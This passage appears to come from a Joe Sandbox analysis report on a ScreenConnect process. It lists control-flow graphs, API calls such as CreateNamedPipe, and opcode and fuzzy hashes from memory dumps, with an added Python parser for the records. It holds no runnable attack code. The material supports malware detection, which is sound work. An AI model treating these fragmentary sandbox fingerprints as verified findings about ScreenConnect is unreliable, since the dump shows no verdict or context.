408->416 417 7ff9cc6c63bf-7ff9cc6c63ca 408->417 506 7ff9cc6c79f0-7ff9cc6c7a1a 411->506 412->388 424 7ff9cc6c6206-7ff9cc6c6214 415->424 425 7ff9cc6c61ff-7ff9cc6c6201 415->425 435 7ff9cc6c63cc-7ff9cc6c63dc 417->435 436 7ff9cc6c638d-7ff9cc6c638e 417->436 418->385 419->398 455 7ff9cc6c6218 424->455 456 7ff9cc6c6216 424->456 434 7ff9cc6c62b5-7ff9cc6c62bb 425->434 440 7ff9cc6c6160-7ff9cc6c6163 431->440 432->440 441 7ff9cc6c62c1-7ff9cc6c62c3 434->441 442 7ff9cc6c636d-7ff9cc6c636f 434->442 444 7ff9cc6c63e2-7ff9cc6c6407 435->444 445 7ff9cc6c6b6f-7ff9cc6c6b80 435->445 436->390 438->445 452 7ff9cc6c6165-7ff9cc6c61f8 440->452 453 7ff9cc6c616d-7ff9cc6c6178 440->453 441->442 454 7ff9cc6c62c9-7ff9cc6c62fd 441->454 442->390 449 7ff9cc6c6371-7ff9cc6c6379 442->449 444->416 445->411 449->390 462 7ff9cc6c637b-7ff9cc6c638b 449->462 450->371 465 7ff9cc6c5ed8-7ff9cc6c5eff 450->465 464 7ff9cc6c5e9e-7ff9cc6c5ed0 451->464 452->415 458 7ff9cc6c61c4-7ff9cc6c61d2 453->458 459 7ff9cc6c617a-7ff9cc6c618c 453->459 454->442 466 7ff9cc6c621a-7ff9cc6c621d 455->466 456->466 481 7ff9cc6c618d-7ff9cc6c6197 458->481 483 7ff9cc6c61d4 458->483 459->481 462->436 485 7ff9cc6c5ed2 464->485 465->371 469 7ff9cc6c6227-7ff9cc6c6232 466->469 470 7ff9cc6c621f-7ff9cc6c6225 466->470 479 7ff9cc6c6234-7ff9cc6c623f 469->479 480 7ff9cc6c627e-7ff9cc6c62a0 469->480 477 7ff9cc6c62a3-7ff9cc6c62b3 470->477 477->434 479->480 480->477 481->438 490 7ff9cc6c619d-7ff9cc6c61c2 481->490 485->450 490->458 509 7ff9cc6c79e8-7ff9cc6c79ea 506->509 510 7ff9cc6c7a1c-7ff9cc6c7a49 call 7ff9cc6c6ce8 * 2 506->510 511 7ff9cc6c79b8-7ff9cc6c79c3 509->511 512 7ff9cc6c79ec-7ff9cc6c79ef 509->512 512->506
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 6$*$E
                                                                                                                                          • API String ID: 0-3555483653
                                                                                                                                          • Opcode ID: e031ee2dd4a45dd9a1a5de5e4c364f19a2f85631405f1818c967ac4828ea3182
                                                                                                                                          • Instruction ID: b07e73f4747af3115bc805e163d3eaf48c8deb30bef163eb83347d46fd1071fb
                                                                                                                                          • Opcode Fuzzy Hash: e031ee2dd4a45dd9a1a5de5e4c364f19a2f85631405f1818c967ac4828ea3182
                                                                                                                                          • Instruction Fuzzy Hash: 8722F132E1CA870BE7AADF289A653B47F91EF95341F0841B9C48DC71D3DD69F8028A45

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 630 7ff9cc6c6f20-7ff9cc6c6f21 631 7ff9cc6c6f22-7ff9cc6c6f24 630->631 632 7ff9cc6c6ef2-7ff9cc6c6efb 631->632 633 7ff9cc6c6f26-7ff9cc6c6f2e 631->633 634 7ff9cc6c6f02-7ff9cc6c6f0b 632->634 637 7ff9cc6c6f32-7ff9cc6c6f34 633->637 636 7ff9cc6c6f12-7ff9cc6c6f1b 634->636 636->630 637->634 638 7ff9cc6c6f36-7ff9cc6c6f3e 637->638 640 7ff9cc6c6f42-7ff9cc6c6f44 638->640 640->636 641 7ff9cc6c6f46-7ff9cc6c6f54 640->641 641->631 643 7ff9cc6c6f55-7ff9cc6c6f64 641->643 643->637 645 7ff9cc6c6f66-7ff9cc6c6f74 643->645 645->640 647 7ff9cc6c6f76-7ff9cc6c6f77 645->647 648 7ff9cc6c6f78 647->648 649 7ff9cc6c6f79-7ff9cc6c6f7c 647->649 648->649 649->643 650 7ff9cc6c6f7e-7ff9cc6c6f87 649->650 651 7ff9cc6c6f88 650->651 652 7ff9cc6c6f89-7ff9cc6c6faa 650->652 651->652 652->648 655 7ff9cc6c6fac-7ff9cc6c6fba 652->655 655->651 657 7ff9cc6c6fbc-7ff9cc6c6fcc 655->657 659 7ff9cc6c7016-7ff9cc6c701c 657->659 660 7ff9cc6c6fce-7ff9cc6c6fea 657->660 665 7ff9cc6c7023-7ff9cc6c7026 659->665 661 7ff9cc6c73f8-7ff9cc6c7416 call 7ff9cc6c0d60 * 2 660->661 662 7ff9cc6c6ff0-7ff9cc6c700e call 7ff9cc6c0d60 * 2 660->662 680 7ff9cc6c7522-7ff9cc6c752d 661->680 681 7ff9cc6c741c-7ff9cc6c7423 661->681 678 7ff9cc6c7014-7ff9cc6c7015 662->678 679 7ff9cc6c728e-7ff9cc6c72ac call 7ff9cc6c0d60 * 2 662->679 668 7ff9cc6c7028-7ff9cc6c702a 665->668 669 7ff9cc6c702c-7ff9cc6c703a call 7ff9cc6c0120 665->669 672 7ff9cc6c703d-7ff9cc6c7052 668->672 669->672 682 7ff9cc6c7054-7ff9cc6c7056 672->682 683 7ff9cc6c7058-7ff9cc6c707c call 7ff9cc6c6c40 * 2 672->683 678->659 704 7ff9cc6c72d6-7ff9cc6c72f4 call 7ff9cc6c0d60 * 2 679->704 705 7ff9cc6c72ae-7ff9cc6c72b8 679->705 685 7ff9cc6c7436-7ff9cc6c7438 681->685 686 7ff9cc6c7425-7ff9cc6c7434 681->686 688 7ff9cc6c707f-7ff9cc6c7094 682->688 683->688 687 7ff9cc6c743f-7ff9cc6c7463 685->687 686->685 694 7ff9cc6c743a 686->694 699 
7ff9cc6c7465-7ff9cc6c7482 687->699 700 7ff9cc6c74af-7ff9cc6c74c5 687->700 702 7ff9cc6c7096-7ff9cc6c7098 688->702 703 7ff9cc6c709a-7ff9cc6c70be call 7ff9cc6c6c40 * 2 688->703 694->687 715 7ff9cc6c7488-7ff9cc6c74ad 699->715 716 7ff9cc6c752e-7ff9cc6c7588 699->716 708 7ff9cc6c70c1-7ff9cc6c70d6 702->708 703->708 731 7ff9cc6c73ab-7ff9cc6c73b6 704->731 732 7ff9cc6c72fa-7ff9cc6c7305 704->732 709 7ff9cc6c72cc 705->709 710 7ff9cc6c72ba-7ff9cc6c72ca 705->710 724 7ff9cc6c70d8-7ff9cc6c70da 708->724 725 7ff9cc6c70dc-7ff9cc6c70f4 call 7ff9cc6c6c40 708->725 713 7ff9cc6c72ce-7ff9cc6c72cf 709->713 710->713 713->704 715->700 735 7ff9cc6c758a-7ff9cc6c75a7 716->735 736 7ff9cc6c75d0-7ff9cc6c75ed 716->736 729 7ff9cc6c7103-7ff9cc6c7111 724->729 725->729 748 7ff9cc6c7113-7ff9cc6c7115 729->748 749 7ff9cc6c7117-7ff9cc6c7125 call 7ff9cc6c0120 729->749 743 7ff9cc6c73b8-7ff9cc6c73ba 731->743 744 7ff9cc6c73bc-7ff9cc6c73cb call 7ff9cc6c0120 731->744 746 7ff9cc6c7307-7ff9cc6c7309 732->746 747 7ff9cc6c730b-7ff9cc6c731a call 7ff9cc6c0120 732->747 750 7ff9cc6c75a9-7ff9cc6c75ce 735->750 751 7ff9cc6c75f0-7ff9cc6c7618 735->751 763 7ff9cc6c75ee 736->763 752 7ff9cc6c73ce-7ff9cc6c73d0 743->752 744->752 754 7ff9cc6c731d-7ff9cc6c7351 746->754 747->754 756 7ff9cc6c7128-7ff9cc6c7129 748->756 749->756 750->736 773 7ff9cc6c761a-7ff9cc6c7646 751->773 774 7ff9cc6c765f-7ff9cc6c7670 751->774 752->680 761 7ff9cc6c73d6-7ff9cc6c73e8 752->761 754->731 766 7ff9cc6c7353-7ff9cc6c7361 754->766 768 7ff9cc6c7130-7ff9cc6c7131 756->768 761->661 763->763 771 7ff9cc6c7374-7ff9cc6c737c 766->771 772 7ff9cc6c7363-7ff9cc6c736b 766->772 778 7ff9cc6c7138-7ff9cc6c713f 768->778 775 7ff9cc6c737d-7ff9cc6c737e 771->775 779 7ff9cc6c738e-7ff9cc6c73a8 771->779 772->775 776 7ff9cc6c736d-7ff9cc6c7372 772->776 791 7ff9cc6c7648-7ff9cc6c7649 773->791 792 7ff9cc6c764c-7ff9cc6c765d 773->792 782 7ff9cc6c76a2-7ff9cc6c76ab 774->782 783 7ff9cc6c7672-7ff9cc6c7681 774->783 784 7ff9cc6c7383-7ff9cc6c738d call 7ff9cc6c6c78 775->784 776->784 778->679 785 
7ff9cc6c7145-7ff9cc6c714c 778->785 779->731 787 7ff9cc6c7683-7ff9cc6c7684 783->787 788 7ff9cc6c7687-7ff9cc6c76a1 783->788 784->779 785->679 789 7ff9cc6c7152-7ff9cc6c7169 785->789 787->788 799 7ff9cc6c716b-7ff9cc6c717d 789->799 800 7ff9cc6c719e-7ff9cc6c71a9 789->800 791->792 792->774 806 7ff9cc6c7183-7ff9cc6c7191 call 7ff9cc6c0120 799->806 807 7ff9cc6c717f-7ff9cc6c7181 799->807 804 7ff9cc6c71ab-7ff9cc6c71ad 800->804 805 7ff9cc6c71af-7ff9cc6c71be call 7ff9cc6c0120 800->805 808 7ff9cc6c71c1-7ff9cc6c71c3 804->808 805->808 810 7ff9cc6c7194-7ff9cc6c7197 806->810 807->810 813 7ff9cc6c7278-7ff9cc6c728a 808->813 814 7ff9cc6c71c9-7ff9cc6c71d7 808->814 810->800 813->679 817 7ff9cc6c71de-7ff9cc6c71e0 814->817 817->813 818 7ff9cc6c71e6-7ff9cc6c7203 817->818 821 7ff9cc6c7205-7ff9cc6c720d 818->821 822 7ff9cc6c720f 818->822 823 7ff9cc6c7211-7ff9cc6c7213 821->823 822->823 823->813 825 7ff9cc6c7215-7ff9cc6c721f 823->825 826 7ff9cc6c7221-7ff9cc6c722b call 7ff9cc6c18c0 825->826 827 7ff9cc6c722d-7ff9cc6c7235 825->827 826->679 826->827 829 7ff9cc6c7263-7ff9cc6c7276 call 7ff9cc6c6c68 827->829 830 7ff9cc6c7237-7ff9cc6c7242 827->830 829->679 830->817 835 7ff9cc6c7244-7ff9cc6c725c call 7ff9cc6c5528 830->835 835->829
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: H
                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                          • Opcode ID: 02b5151222ea49a7a139ffd7e982af5166ac0d8e06e5b6b2125919d5aa679731
                                                                                                                                          • Instruction ID: 1dfd0b51726bba4d2609c12e787e986714a4991c0b4bb341f060549cab34b41f
                                                                                                                                          • Opcode Fuzzy Hash: 02b5151222ea49a7a139ffd7e982af5166ac0d8e06e5b6b2125919d5aa679731
                                                                                                                                          • Instruction Fuzzy Hash: B432F221E1CAC74FE796DF2896657B9AFD2EF95301F14007AD08EC71D2DE9AB8058B40

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 952 7ff9cc3b3642-7ff9cc3d58ba 955 7ff9cc3d58c4-7ff9cc3d5981 CreateNamedPipeW 952->955 956 7ff9cc3d58bc-7ff9cc3d58c1 952->956 958 7ff9cc3d5983 955->958 959 7ff9cc3d5989-7ff9cc3d59bc 955->959 956->955 958->959
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2347637328.00007FF9CC3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc3b0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateNamedPipe
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2489174969-0
                                                                                                                                          • Opcode ID: 2c9fddf7a6f40206cf90ecad4e770383947b9705077954a603238ce89fb88441
                                                                                                                                          • Instruction ID: 3844843374d309dc53cf3e4dacbc14e52635ad94ab36977a407c77e919b53650
                                                                                                                                          • Opcode Fuzzy Hash: 2c9fddf7a6f40206cf90ecad4e770383947b9705077954a603238ce89fb88441
                                                                                                                                          • Instruction Fuzzy Hash: 29518271918A5C8FDB58EF5C9845BE9BBE0FB59710F0442AEE04DD3251CB70A8958BC1

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 611 7ff9cc6c48c9-7ff9cc6c48da 612 7ff9cc6c48a8-7ff9cc6c48b1 611->612 613 7ff9cc6c48dc-7ff9cc6c4916 611->613 616 7ff9cc6c48b6-7ff9cc6c48c7 612->616 620 7ff9cc6c4918-7ff9cc6c4937 613->620 621 7ff9cc6c4939-7ff9cc6c4983 613->621 620->621 628 7ff9cc6c4985-7ff9cc6c4986 621->628 629 7ff9cc6c498d-7ff9cc6c4995 621->629 628->629
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: /$*$/$*
                                                                                                                                          • API String ID: 0-2770925684
                                                                                                                                          • Opcode ID: 113d07560e3503d7dace36239f6bacc63e2752f8ef3f3223677829e5c5c7f5ea
                                                                                                                                          • Instruction ID: 68fc5cdd0f168c763c413b1965a2b93536df04e1e6cde18fff88993a178b957f
                                                                                                                                          • Opcode Fuzzy Hash: 113d07560e3503d7dace36239f6bacc63e2752f8ef3f3223677829e5c5c7f5ea
                                                                                                                                          • Instruction Fuzzy Hash: E621C311B1CA9B0BE399EF6899A17B0ABD1EF59311B4540BAD04DC32D3EE99AC418781

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2347637328.00007FF9CC3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc3b0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                          • Opcode ID: ef1bcdff8d3359e1961cecf0ba79a490f6d976e2e35709f6fcf878729dc787c4
                                                                                                                                          • Instruction ID: a8c12b1f01d5df4f6c503233794b34ff0c6943018ee23c708595a5c51f1ff0f2
                                                                                                                                          • Opcode Fuzzy Hash: ef1bcdff8d3359e1961cecf0ba79a490f6d976e2e35709f6fcf878729dc787c4
                                                                                                                                          • Instruction Fuzzy Hash: 13511831D1C7894FDB18DFA8AC465F97BE0EF56360F04417FE489C3192DA64B8468B92

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1087 7ff9cc6c5f74-7ff9cc6c5f79 1088 7ff9cc6c6040-7ff9cc6c6047 1087->1088 1089 7ff9cc6c5f7f-7ff9cc6c5f9e 1087->1089 1090 7ff9cc6c60d7-7ff9cc6c60de 1088->1090 1091 7ff9cc6c604d-7ff9cc6c6054 1088->1091 1097 7ff9cc6c5fea-7ff9cc6c5ffe 1089->1097 1098 7ff9cc6c5fa0-7ff9cc6c5fbd 1089->1098 1092 7ff9cc6c60e9-7ff9cc6c60fc 1090->1092 1093 7ff9cc6c60e0-7ff9cc6c60e7 1090->1093 1091->1090 1095 7ff9cc6c605a-7ff9cc6c6064 1091->1095 1111 7ff9cc6c60fe-7ff9cc6c6103 1092->1111 1112 7ff9cc6c610d-7ff9cc6c6115 1092->1112 1093->1092 1096 7ff9cc6c6126-7ff9cc6c612d 1093->1096 1095->1096 1105 7ff9cc6c606a-7ff9cc6c60d5 1095->1105 1099 7ff9cc6c6133-7ff9cc6c613a 1096->1099 1100 7ff9cc6c6391-7ff9cc6c6398 1096->1100 1107 7ff9cc6c6030-7ff9cc6c6031 1097->1107 1108 7ff9cc6c6000-7ff9cc6c600a 1097->1108 1113 7ff9cc6c6b54-7ff9cc6c6b5c 1098->1113 1114 7ff9cc6c5fc3-7ff9cc6c5fe8 1098->1114 1099->1100 1106 7ff9cc6c6140-7ff9cc6c6143 1099->1106 1109 7ff9cc6c6b2e-7ff9cc6c6b41 1100->1109 1110 7ff9cc6c639e-7ff9cc6c63a5 1100->1110 1105->1096 1116 7ff9cc6c6145-7ff9cc6c6147 1106->1116 1117 7ff9cc6c614c-7ff9cc6c615a 1106->1117 1123 7ff9cc6c6038-7ff9cc6c6039 1107->1123 1118 7ff9cc6c6018-7ff9cc6c6022 1108->1118 1119 7ff9cc6c600c-7ff9cc6c6016 call 7ff9cc6c55e0 1108->1119 1110->1109 1120 7ff9cc6c63ab-7ff9cc6c63bd 1110->1120 1111->1112 1121 7ff9cc6c6b81-7ff9cc6c6c58 1112->1121 1122 7ff9cc6c611b-7ff9cc6c611f 1112->1122 1142 7ff9cc6c6b5d-7ff9cc6c6b6e 1113->1142 1114->1097 1126 7ff9cc6c61fa-7ff9cc6c61fd 1116->1126 1144 7ff9cc6c615c 1117->1144 1145 7ff9cc6c615e 1117->1145 1118->1123 1130 7ff9cc6c6024-7ff9cc6c602e call 7ff9cc6c18c0 1118->1130 1119->1107 1119->1118 1128 7ff9cc6c6409-7ff9cc6c6421 1120->1128 1129 7ff9cc6c63bf-7ff9cc6c63ca 1120->1129 1207 7ff9cc6c79f0-7ff9cc6c7a1a 1121->1207 1122->1096 1123->1088 1136 7ff9cc6c6206-7ff9cc6c6214 1126->1136 1137 
7ff9cc6c61ff-7ff9cc6c6201 1126->1137 1147 7ff9cc6c63cc-7ff9cc6c63dc 1129->1147 1148 7ff9cc6c638d-7ff9cc6c638e 1129->1148 1130->1107 1130->1123 1163 7ff9cc6c6218 1136->1163 1164 7ff9cc6c6216 1136->1164 1146 7ff9cc6c62b5-7ff9cc6c62bb 1137->1146 1157 7ff9cc6c6b6f-7ff9cc6c6b80 1142->1157 1152 7ff9cc6c6160-7ff9cc6c6163 1144->1152 1145->1152 1153 7ff9cc6c62c1-7ff9cc6c62c3 1146->1153 1154 7ff9cc6c636d-7ff9cc6c636f 1146->1154 1156 7ff9cc6c63e2-7ff9cc6c6407 1147->1156 1147->1157 1148->1100 1160 7ff9cc6c6165-7ff9cc6c61f8 1152->1160 1161 7ff9cc6c616d-7ff9cc6c6178 1152->1161 1153->1154 1162 7ff9cc6c62c9-7ff9cc6c62fd 1153->1162 1154->1100 1159 7ff9cc6c6371-7ff9cc6c6379 1154->1159 1156->1128 1157->1121 1159->1100 1166 7ff9cc6c637b-7ff9cc6c638b 1159->1166 1160->1126 1169 7ff9cc6c61c4-7ff9cc6c61d2 1161->1169 1170 7ff9cc6c617a-7ff9cc6c618c 1161->1170 1162->1154 1172 7ff9cc6c621a-7ff9cc6c621d 1163->1172 1164->1172 1166->1148 1185 7ff9cc6c61d4 1169->1185 1186 7ff9cc6c618d-7ff9cc6c6197 1169->1186 1170->1186 1175 7ff9cc6c6227-7ff9cc6c6232 1172->1175 1176 7ff9cc6c621f-7ff9cc6c6225 1172->1176 1183 7ff9cc6c6234-7ff9cc6c623f 1175->1183 1184 7ff9cc6c627e-7ff9cc6c62a0 1175->1184 1181 7ff9cc6c62a3-7ff9cc6c62b3 1176->1181 1181->1146 1183->1184 1184->1181 1186->1142 1192 7ff9cc6c619d-7ff9cc6c61c2 1186->1192 1192->1169 1210 7ff9cc6c79e8-7ff9cc6c79ea 1207->1210 1211 7ff9cc6c7a1c-7ff9cc6c7a49 call 7ff9cc6c6ce8 * 2 1207->1211 1212 7ff9cc6c79b8-7ff9cc6c79c3 1210->1212 1213 7ff9cc6c79ec-7ff9cc6c79ef 1210->1213 1213->1207
Strings
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: 6$*
• API String ID: 0-1145867818
• Opcode ID: e480a54d5325e92211eea55b7260aad0ec6f09146a260b6bc9b8ae5cc7f0dce0
• Instruction ID: 320690fabb3a4a0121a7ab3aed2ca72fe30a844d684a77350b077ff73db47f30
• Opcode Fuzzy Hash: e480a54d5325e92211eea55b7260aad0ec6f09146a260b6bc9b8ae5cc7f0dce0
• Instruction Fuzzy Hash: 41A11121E0DAC70BEB5BEF289BA12B46F91EF46351B0840B9D48DDA1D3CD59F8068B45

Control-flow Graph

• Executed
• Not Executed

control_flow_graph: basic-block edge list for the function whose entry block is 7ff9cc6c70f7-7ff9cc6c7111; its blocks extend to 7ff9cc6c76ab. Call targets in the graph: 7ff9cc6c0120, 7ff9cc6c0d60 (always in pairs), 7ff9cc6c6c78, 7ff9cc6c18c0, 7ff9cc6c6c68 and 7ff9cc6c5528.
Strings
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: H
• API String ID: 0-2852464175
• Opcode ID: 0a05188b5e893a7751834831b49ec5e51e115e54fb6447b5546ef40fce0e47ad
• Instruction ID: 9b57efaabde47fdba03e202f8814e4b97acf465105e0a032b4510d18775270a9
• Opcode Fuzzy Hash: 0a05188b5e893a7751834831b49ec5e51e115e54fb6447b5546ef40fce0e47ad
• Instruction Fuzzy Hash: 19717831E1C9874AFB96DE2483517BDAAD2EF94342F544439D49EC31C1DFAEB8468A40
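The records on this page are a flat text export of per-function metadata. To make them searchable (for example, to find the same function body by Opcode ID across several dumps, or to pull call targets out of the flattened control_flow_graph edge list), the following added Python parser reads blocks in exactly the layout shown above. It is example code, not part of the Joe Sandbox report and not ScreenConnect code; the sample input is a constructed excerpt copied from the graph and the records above (the edge list is truncated), and the field names are the report's own.

```python
# Parse Joe Sandbox per-function records ("Memory Dump Source" / "Joe Sandbox IDA
# Plugin" / "Similarity" blocks) and summarise the flattened control_flow_graph
# edge dump that precedes each one. Added example, not code from the report.
import re
from collections import defaultdict

# Constructed sample: a truncated edge dump (wrapped onto two lines, as the
# extracted report does) plus two records copied from this page.
SAMPLE = """
    control_flow_graph 1272 7ff9cc6c70f7-7ff9cc6c7111 1275 7ff9cc6c7113-7ff9cc6c7115 1272->1275 1276 7ff9cc6c7117-7ff9cc6c7125 call 7ff9cc6c0120 1272->1276 1283 7ff9cc6c728e-7ff9cc6c72ac call 7ff9cc6c0d60 * 2 1281->1283
    1350 7ff9cc6c7383-7ff9cc6c738d call 7ff9cc6c6c78 1345->1350 1407 7ff9cc6c76a2-7ff9cc6c76ab 1403->1407
    Strings
    Memory Dump Source
    • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
    Similarity
    • API ID:
    • String ID: H
    • API String ID: 0-2852464175
    • Opcode ID: 0a05188b5e893a7751834831b49ec5e51e115e54fb6447b5546ef40fce0e47ad
    • Instruction ID: 9b57efaabde47fdba03e202f8814e4b97acf465105e0a032b4510d18775270a9
    • Opcode Fuzzy Hash: 0a05188b5e893a7751834831b49ec5e51e115e54fb6447b5546ef40fce0e47ad
    • Instruction Fuzzy Hash: 19717831E1C9874AFB96DE2483517BDAAD2EF94342F544439D49EC31C1DFAEB8468A40
    Memory Dump Source
    • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ae12b02401195480b6d45ce787e23fec367733db4535b0960df1322ee826dcd8
    • Instruction ID: 34addec0059e4887f46511f8126a299b68fd0a2e5921c0d628cb6664648783eb
    • Opcode Fuzzy Hash: ae12b02401195480b6d45ce787e23fec367733db4535b0960df1322ee826dcd8
    • Instruction Fuzzy Hash: E812B427E0E7D34FE717DB285AA61E53FA0DF53225B0D00F7C4C8DA0A3E94A684A8751
"""

BULLET = re.compile(r"^•\s*([^:]+):\s*(.*)$")                 # "• Key: value" lines
BLOCK = re.compile(r"\b([0-9a-f]{8,16})-([0-9a-f]{8,16})\b")   # basic-block address ranges
CALL = re.compile(r"\bcall ([0-9a-f]{8,16})(?: \* (\d+))?")    # "call X" or "call X * N"
CFG_CONT = re.compile(r"^\d+(?:->\d+|\s+[0-9a-f]{8,16}-)")     # edge list wrapped onto a new line
SOURCE = re.compile(r"^(?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
HEX64 = re.compile(r"^[0-9a-f]{64}$")
HEXSTR = re.compile(r"^[0-9A-Fa-f]+$")

def summarize_cfg(text):
    """Reduce an edge dump to entry block, highest block end and call-target counts."""
    blocks = BLOCK.findall(text)
    calls = defaultdict(int)
    for target, mult in CALL.findall(text):
        calls[target] += int(mult) if mult else 1   # "* N" means N calls from that block
    return {
        "entry": blocks[0][0] if blocks else None,
        "last_block_end": max((e for _, e in blocks), key=lambda h: int(h, 16), default=None),
        "block_count": len(blocks),
        "calls": dict(calls),
    }

def parse_records(text):
    """One dict per 'Memory Dump Source' record: its bulleted fields plus the CFG summary."""
    records, current, cfg_text = [], None, None
    for raw in text.splitlines():
        line = raw.strip()                          # extraction indents every line; drop it
        if not line:
            continue
        if line.startswith("control_flow_graph"):   # a graph opens the next function
            cfg_text, current = line, None
        elif cfg_text is not None and CFG_CONT.match(line):
            cfg_text += " " + line                  # continuation of a wrapped edge list
        elif line == "Memory Dump Source":
            current = {"cfg": summarize_cfg(cfg_text) if cfg_text else None}
            cfg_text = None
            records.append(current)
        elif current is not None and (m := BULLET.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            src = SOURCE.match(value) if key == "Source File" else None
            if src:                                 # split the composite Source File field
                current["Source File"] = src["file"]
                current["Offset"] = int(src["offset"], 16)
                current["Based on PE"] = src["pe"] == "true"
            else:
                current[key] = value
    return records

def check_record(rec):
    """Return extraction problems (empty list = well formed). On this page Opcode ID
    always equals Opcode Fuzzy Hash, so a mismatch or non-hex ID means mangled text."""
    problems = [f"{k} is not 64 hex digits" for k in ("Opcode ID", "Instruction ID")
                if not HEX64.match(rec.get(k, ""))]
    if rec.get("Opcode ID") != rec.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    if not HEXSTR.match(rec.get("Instruction Fuzzy Hash", "")):
        problems.append("Instruction Fuzzy Hash is not hex")
    return problems

def group_by_opcode_id(records):
    """Index records by Opcode ID; a shared ID is the same function body seen twice."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec.get("Opcode ID")].append(rec.get("Snapshot File"))
    return dict(groups)
```

`parse_records(SAMPLE)` yields two records: the first carries the graph summary (entry block 7ff9cc6c70f7, one call to 7ff9cc6c0120, two to 7ff9cc6c0d60, one to 7ff9cc6c6c78), the second has no graph because none preceded it. `check_record` only catches the usual extraction damage (truncated or non-hex IDs, a fuzzy hash that no longer matches its ID); it cannot verify the hashes themselves, since the page does not show how Joe Sandbox computes them.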
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ae12b02401195480b6d45ce787e23fec367733db4535b0960df1322ee826dcd8
• Instruction ID: 34addec0059e4887f46511f8126a299b68fd0a2e5921c0d628cb6664648783eb
• Opcode Fuzzy Hash: ae12b02401195480b6d45ce787e23fec367733db4535b0960df1322ee826dcd8
• Instruction Fuzzy Hash: E812B427E0E7D34FE717DB285AA61E53FA0DF53225B0D00F7C4C8DA0A3E94A684A8751
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
